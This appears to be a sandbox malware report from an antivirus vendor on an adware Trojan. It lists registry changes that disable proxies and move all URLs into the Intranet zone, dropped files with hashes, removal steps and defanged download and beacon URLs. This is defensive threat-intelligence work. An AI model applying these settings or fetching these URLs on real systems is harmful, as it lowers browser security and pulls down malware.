[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc_Expiration" = "1441945355227"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE D8 35 F4 E4 60 CD EF 9C B0 F1 DC 25 A7 F1 00"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467evaob23" = "60000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"E419E2445BF82ob23" = "300000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process taedko.exe:1988 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB A5 16 D9 CC AE C9 5D 14 0C DD F9 21 73 C3 6F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process dag17797.exe:552 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015090820150909\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePrefix" = ":2015090820150909:"

"CacheRepair" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 3B 7A 7A 17 03 FA 6D 1F B5 6E BA 76 AD 76 E6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
a28a6aa25d416848937de3b817d49784	c:\Documents and Settings\All Users\Application Data\IlejwTivc\Uninstaller.exe
740c93fdf9dedfffd5c300aeb9c8eba5	c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3ko.dll
4b0a71b036a1759bd0a9a6d8d7286470	c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3ko.exe
740c93fdf9dedfffd5c300aeb9c8eba5	c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3kod.dll
846c526984e6eaf579d6b26b96cbabb9	c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6ko.dll
59b859426c5cb1f82ca551cdeb3a04ef	c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6ko.exe
846c526984e6eaf579d6b26b96cbabb9	c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6kod.dll
a005b797c5ebd5bf0d3bff9d9e0e36b0	c:\Documents and Settings\All Users\Application Data\IlejwTivc\taeako.exe
01ee425920c921ca8fbf6710bbb8e705	c:\Documents and Settings\All Users\Application Data\IlejwTivc\taedko.exe
44c191f29f65760a5be1f7a4c7a45c12	c:\Documents and Settings\All Users\Application Data\IlejwTivc\taewko.exe
98d858a74ed18756c6fa5fcb0ee620fd	c:\Documents and Settings\All Users\Application Data\IlejwTivc\utils.exe
dae0fba97a137277189223ea9ede1175	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\tmp30731\dag17797.exe
5264f7d6d89d1dc04955cfb391798446	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\GetVersion.dll
b140459077c7c39be4bef249c2f84535	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\Math.dll
c17103ae9072a06da581dec998343fc1	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\System.dll
7579ade7ae1747a31960a228ce02e666	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\UserInfo.dll
5afd4a9b7e69e7c6e312b2ce4040394a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\blowfish.dll
94ba775c8a1f4d6c9bb1966eddce22b5	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\manlib.dll
fe3f848e2a306d586ab8f5433738d8db	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll
c10e04dd4ad4277d5adc951bb331c777	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsDialogs.dll
5f13dbc378792f23e598079fc1e4422b	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsisunz.dll
2b7007ed0262ca02ef69d8990815cbeb	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\registry.dll
febff2c363c7f7664687eefe8253087e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\serlib.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:924
taeako.exe:900
taeako.exe:2352
taeako.exe:212
taeako.exe:972
taeako.exe:948
taeako.exe:2980
taeako.exe:2644
taeako.exe:1536
taeako.exe:544
taeako.exe:436
taedko.exe:1988
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)
%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
%WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 1.1.0.31
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.31
File Description:
Comments:
Language: Language Neutral

Company Name: Product Name: Product Version: 1.1.0.31Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 1.1.0.31File Description: Comments: Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23130	23552	4.44841	0bc2ffd32265a08d72b795b18265828d
.rdata	28672	4496	4608	3.59163	f179218a059068529bdb4637ef5fa28e
.data	36864	110488	1024	3.26405	975304d6dd6c4a4f076b15511e2bbbc0
.ndata	147456	77824	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	225280	16944	17408	4.08558	e9d00de7898ae3a42a8383ed8a0b0e7f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 287
05a7d3434a4f7fdbf0701537409ba2c8
28b85a68ade122e0932bc011d2e4741e
85384e1d38290e1be1b941708ef98de7
90c45221acad769be1f420e26fb96e4e
3e9501bc32b06042e7bcccdf0669fafa
99bbb5f56a0e982061037a96fd219d2e
167d6007985099cb7013fbf1130a54b3
d77835ac151ab2189ea5019f70e1dc9e
c2b1c2a1b9eeb54404eab8ffaac8ab3d
a901bec47b03673fb1dbb3071e83a05f
bcf2db92c2535d1f05c86a8706618c3c
2d6a16c59156f3d26a0161fa787d5ecb
6a17857090567191d9d5407fb1be7a60
14ad705a1481ad0fac61ac3380f71743
4dcc650e7da22e29ee760ae17093af75
63e751baab159c93c34296d8a60d605a
ce32769a77e3a5231c15f461eddfc257
df58c89f399dc0e07adb04521036be4c
e3df55b2211eca7c68f70aff300b5de1
21652c1165a4cc603f5755d9996b329d
083cd9d058cf091f0d2ff94d2183e254
75f54e31f102aa950f332c5557e0b6ae
cee30d0a7c755a06d734276fb2f8b21b
38926abc005c6822d288bee19dc5ed9b
383860ca1a012fc8db9189d1ffb6e360

Network Activity

URLs

URL	IP
hxxp://ghs.googlehosted.com/rp/v/image.jpg
hxxp://ghs.googlehosted.com/wrp/ri
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141
hxxp://dildmbfdhsxh6.cloudfront.net/amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81
hxxp://ghs.googlehosted.com/up/v/update
hxxp://cojun15cart.com/download.php?kHmDdWc=
hxxp://cds.i9x9t3x4.hwcdn.net/testadsreel_10656.exe
hxxp://fcesneim.us/FCL_Co_Unq_remote_v5.php
hxxp://fcesneim.us/DSS_Unq_IMapplication_mon_remote.php
hxxp://cds.i9x9t3x4.hwcdn.net/os/rm/OfferScreen_12_HD.zip
hxxp://cds.i9x9t3x4.hwcdn.net/os/rm/OfferScreen_422.zip
hxxp://dildmbfdhsxh6.cloudfront.net/core/ammapp.js?x=1&cb=1441686154118&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/lgv.js?r=9&cb=1441686154352&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81
